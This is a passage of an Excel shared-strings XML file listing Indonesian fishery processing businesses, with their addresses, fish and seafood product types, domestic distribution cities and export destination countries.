    <t>Jl. Pelantar KUD No.98, Kel. Tanjungpinang, Kec. Tanjungpinang, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Merah, Kaci-kaci, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Raya Perancis, Pergudangan Mutiara Kosambi 1 Blok A5 No.5, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Perancis, Pergudangan Mutiara Kosambi I Blok A5 No.5, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Australia, Cambodia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Makerel, Lemadang, Meka, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Katamba, Anggoli, Kerapu, Layur, Kakap, Ayam-ayam, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Makerel, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Kakap, Ayam-ayam, Kurisi)</t>
  </si>
  <si>
    <t>Desa Aro RT 01, Kec. Muara Bulian, Kabupaten Batang Hari&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Kabupaten Batang Hari, Kota Jambi</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto No.108, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>France, Spain, Thailand</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Bawal, Bream, Layur)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Cakalang, Barakuda)</t>
  </si>
  <si>
    <t>Central African Republic, China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, South Africa, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Tropoda Depan 126 B, Kel. Tropodo, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, Brunei Darussalam, China, Germany, Japan, Korea, Democratic People's Republic of, Malaysia, Netherlands, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Jenggolo II/17 , Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kerupuk Ikan Goreng, Kerupuk Udang Goreng</t>
  </si>
  <si>
    <t>Kabupaten Semarang, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Japan, Malaysia, Netherlands, Singapore, Taiwan, Province of China, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bandung</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Kima No.20, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerisi, Lencam, Manyung, Kuwe, Angoli, Kerapu, Moonfish, Kakap)</t>
  </si>
  <si>
    <t>Komplek Workshop PHPT Kav 5 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Marlin, Gindara, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Sebelah, Manyung, Kerapu, Layur, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Griya Paniki Indah, Kel. Kairagi, Kec. Mapanget, Kota Manado&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kampung Jati RT 002 RW 001, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Selar, Tenggiri, Parang-parang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal Hitam, Sebelah, Kerapu, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Pantai Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Deho, Kembung, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Katamba, Kuwe, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Katamba, Kuwe, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Kembung, Lemadang, Salem, Banjar, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kerapu, Layur, Bawal, Kakap, Baronang, Kuro, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Chips Karaginan</t>
  </si>
  <si>
    <t>Jl. Masjid Annur, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Lemuru, Deho, Malalugis, Maesang, Sarden, Selar, Layang)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Kabupaten Paser</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar</t>
  </si>
  <si>
    <t>Cephalopod Beku (Cumi-Cumi)</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Komplek Pergudangan Kosambi Permai Blok O No.1 (Room 1), Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Panni, Tongkol, Kawabida, Salem)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Mata Goyang, Lencam, Sebelah, Kerapu, Kakatua, Bawal, Selar, Kakap, Ayam-ayam, Kaci-kaci, Kurisi, Seabass, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Lencam, Sebelah, Kerapu, Kakatua, Bawal, Selar, Kakap, Ayam-ayam, Kaci-kaci, Kurisi, Seabass, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Teri, Bonito, Pisang-pisang, Kuwe, Kembung, Makerel, Lemadang, Gindara, Sauri Pasifik, Tenggiri, Todak, Makerel Atlantik)</t>
  </si>
  <si>
    <t>Italy, Japan, Korea, Democratic People's Republic of, Portugal</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Bonito, Pisang-pisang, Kuwe, Kembung, Makerel, Lemadang, Gindara, Sauri Pasifik, Tenggiri, Todak, Makerel Atlantik)</t>
  </si>
  <si>
    <t>Jl. Letkol Ali Hasan TPI, Kel. Lugu, Kec. Simeulue Timur, Kabupaten Simeulue&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho, Selayang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Deho, Selayang)</t>
  </si>
  <si>
    <t xml:space="preserve"> Jl. KHA Jabbar Ashiry No.1, Kel. Pai, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Otak-otak Ikan) </t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kota Pontianak, Kota Manado, Kota Bitung, Kota Tomohon</t>
  </si>
  <si>
    <t>Ikan Asap Kering</t>
  </si>
  <si>
    <t>Kota Pasuruan, Kota Bitung</t>
  </si>
  <si>
    <t>Spain, Thailand</t>
  </si>
  <si>
    <t>Jl. Raya Perancis No.2 Room 1 Komplek Pergudangan Kosambi Permai Blok E No.40, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Banjar No.66 RT 27, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kuwe, Tenggiri)</t>
  </si>
  <si>
    <t>Kampung Tapiri, Kel. Kaibus, Kec. Teminabuan, Kabupaten Sorong Selatan&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Jl. Dr. Makaliwe 1 No. 17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kabupaten Belitung, Kota Batam</t>
  </si>
  <si>
    <t>Australia, China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Malong, Layur, Lemadang, Kakatua, Kakap Merah)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Meka, Gindara, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Dr. Makaliwe 1 No.17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Fillet Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Kabupaten Bangka, Kabupaten Belitung</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Pergudangan 75 Blok F No.6A, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Marlin, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Jl. Ujung Pandang Baru No.17, Kel. La'latang, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Chile, China, France, Spain</t>
  </si>
  <si>
    <t>China, India, Japan, Korea, Republic of</t>
  </si>
  <si>
    <t>Gudang Alat Perikanan Blok D No.3, Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Kembung, Muroaji, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Halibut, Bawal, Rejung, Kakap)</t>
  </si>
  <si>
    <t>Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerisi, Lencam, Layur, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerisi, Lencam, Layur, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Lencam, Kerapu, Kakatua, Bawal, Kakap, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Sambal Tuna</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Pacitan, Kabupaten Ponorogo, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Raya Bogo - Kunjang RT 008 RW 001, Kel. Mojoayu, Kec. Plemahan, Kabupaten Kediri&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Bekicot Beku</t>
  </si>
  <si>
    <t>Canada, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Marlin, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Layur, Kakap Putih, Kuniran, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Layur, Kakap Putih, Kuniran, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Selar, Kembung, Layang, Tongkol, Cakalang, Tenggiri, Marlin, Layaran)</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Malaysia, Philippines, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Salem, Sarden, Layang, Lemuru, Tembang, Banjar, Cakalang)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>BTN Palupi Blok BS 2 No.11, Kel. Palupi, Kec. Tatanga, Kota Palu&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>Kota Palu</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Manyung, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Daeng Tata Raya, Ruko Permata Mutiara Blok A 26-28, Kel. Parang Tambung, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Australia, Belarus, Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Philippines, Russian Federation, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Daeng Tata Raya, Ruko Permata Mutiara Blok A26-28, Kel. Parang Tambung, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Belarus, Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Russian Federation, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kabupaten Purbalingga, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Cumi-cumi Bernilai Tambah Beku (Bakso Cumi-cumi, Pangsit Cumi-cumi, Martabak Cumi-cumi, Naget Cumi-cumi)</t>
  </si>
  <si>
    <t>Kota Semarang, Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Pasuruan</t>
  </si>
  <si>
    <t>Komplek CBD Blok C1 No.11 RT 014 RW 007, Kel. Cengkareng Timur, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Kima 14 No.F2 SS3, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>China, France, Korea, Republic of, United States</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Purwakarta, Kota Bandung, Kota Bekasi</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Otak-otak Ikan, Naget, Siomay, Kue Ikan) </t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Purwakarta, Kota Bekasi</t>
  </si>
  <si>
    <t>Pulau Nipah Jembatan II, Kel. Pulau Setokok, Kec. Bulang, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Jl. Gunung Patas No.1, Kel. Padang Sambian Kelod, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Salmon Asap</t>
  </si>
  <si>
    <t>Herring Acar Gulung</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar, Kota Palangka Raya, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No.38 Blok H2-10, Kel. Parang Loe, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Spain</t>
  </si>
  <si>
    <t>Kabupaten Nunukan</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Bonito, Tongkol, Marlin, Aso-aso, Cakalang, Kuring, Bulan)</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kabupaten Tapanuli Selatan, Kabupaten Tapanuli Tengah, Kabupaten Tapanuli Utara, Kabupaten Toba Samosir, Kabupaten Labuhan Batu, Kabupaten Deli Serdang, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Binjai, Kota Dumai</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Oman, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Goyang, Malong, Gulama, Emperor, Kerapu, Bawal, Terisi)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kambing-kambing, Layur, Senangin, Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Jl. Margomulyo Permai Blok H5, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Lamongan, Kabupaten Bangkalan, Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Poros Toronipa, Kel. Tapulaga, Kec. Soropia, Kabupaten Konawe&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Kakap Merah)</t>
  </si>
  <si>
    <t>Dermaga Muara Angke No.6 RT 001 RW 011, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kabupaten Bangka, Kabupaten Belitung, Kota Pangkal Pinang, Kota Batam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel Atlantik, Lemuru, Tongkol, Capelin, Kembung, Lemadang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bawal, Malong, Gulama, Lencam, Manyung)</t>
  </si>
  <si>
    <t>Jl. Veteran, Kel. Girian Bawah Lingkungan IV, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Pusat, Kota Surabaya</t>
  </si>
  <si>
    <t>Desa Wai Muli Timur RT 002 RW 001, Kec. Rajabasa, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Kabupaten Lampung Selatan, Kota Bandar Lampung, Kota Tangerang</t>
  </si>
  <si>
    <t>Harapan Baru Regency C-1/9 RT 003 RW 014, Kel. Kota Baru, Kec. Bekasi Barat, Kota Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto No.71, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Cakalang)</t>
  </si>
  <si>
    <t>Kota Sibolga</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kambing-kambing, Layur)</t>
  </si>
  <si>
    <t>Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Layang, Cakalang, Salem)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Jl. Peternakan 2 No.28, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sumedang, Kabupaten Karawang, Kabupaten Serang</t>
  </si>
  <si>
    <t>Jl. Kima 17 Kav. DD - 9A, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Medan, Kota Bogor, Kota Surabaya</t>
  </si>
  <si>
    <t>Dusun Pesisir RT 001 RW 001, Kel. Kaduara Timur, Kec. Pragaan, Kabupaten Sumenep&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Desa Banteng RT 03 No.75, Kec. Pangkalan Baru, Kabupaten Bangka Tengah&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Kemplang Cumi-cumi</t>
  </si>
  <si>
    <t>Kemplang Ikan</t>
  </si>
  <si>
    <t>Pancur No.1 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Bawal, Kerapu, Lebam, Ketarap, Kapas-kapas, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Jambi, Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Japuh, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Cephalopoda Kering (Sotong, Cumi-cumi)</t>
  </si>
  <si>
    <t>Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Korea, Republic of, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Pancur No.7 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Kerapu, Lebam, Ketarap, Kapas-kapas, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Kabupaten Lingga, Kota Batam</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna IV Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kabupaten Bandung, Kabupaten Karang Asem, Kota Denpasar</t>
  </si>
  <si>
    <t>Philippines, United States</t>
  </si>
  <si>
    <t>Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Salem)</t>
  </si>
  <si>
    <t>Canada, France, Italy, Singapore, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, New Zealand, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Indramayu, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Gudang Taman Niaga Sukajadi Blok E1 No.1, Kel. Sukajadi, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Kima XVII, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Marlin, Layaran, Layang)</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No.2, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Kakap, Bawal Hitam, Gulama, Layur, Jenaha)</t>
  </si>
  <si>
    <t>Jl. Pendopo No.07 RT 019 RW 004, Kel. Sembayat, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Bandeng Isi, Bandeng Presto) </t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
